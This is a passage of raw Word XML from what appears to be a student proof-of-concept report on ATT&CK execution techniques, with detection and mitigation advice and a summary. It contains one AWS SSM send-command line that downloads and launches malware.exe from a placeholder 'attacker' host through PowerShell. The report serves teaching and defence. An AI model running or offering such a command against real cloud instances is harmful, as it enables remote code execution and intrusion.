          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> send-command </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--instance-ids</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> i-0abcdef </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--document-name</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS-RunPowerShellScript </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>'commands</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0044007E">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>"Invoke-WebRequest http://attacker/malware.exe -OutFile C:\\temp\\malware.exe", "Start-Process C:\\temp\\malware.exe"]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="detection-mitigations"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>🛡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r>
        <w:t>etection &amp; Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell (T1059):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enable logging, alert on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>ExecutionPolicy Bypass</w:t>
      </w:r>
      <w:r>
        <w:t>, and detect unusual script activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malicious Files (T1204.002):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Block macros, enable attachment filtering, and train users to avoid suspicious documents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud Ad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>min Tools (T1651):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Monitor for unexpected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>RunCommand</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SSM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> activity; enforce JIT access; restrict privileged roles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E" w:rsidP="00EA144E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="summary"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>This PoC demonstrates three real-world attack methods under the “Execution” tactic. It reflects common adversary behavior and sho</w:t>
      </w:r>
      <w:r>
        <w:t>ws how threat actors blend scripting, social engineering, and cloud abuse for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4B74" w:rsidRDefault="0044007E">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submitted to:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Digisuraksha Parhari Foundation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:sectPr w:rsidR="002D4B7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D625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B3415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5408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50834FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="386C1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44EE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A52AB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4"/>
    <w:rsid w:val="000059A2"/>
    <w:rsid w:val="00125936"/>
    <w:rsid w:val="002A5247"/>
    <w:rsid w:val="002D4B74"/>
    <w:rsid w:val="0044007E"/>
    <w:rsid w:val="004A40DC"/>
    <w:rsid w:val="00660D97"/>
    <w:rsid w:val="00917DCF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447B"/>
  <w15:docId w15:val="{340C85F7-5A8F-4157-94A3-3AEAA75A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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-03T10:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-03T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>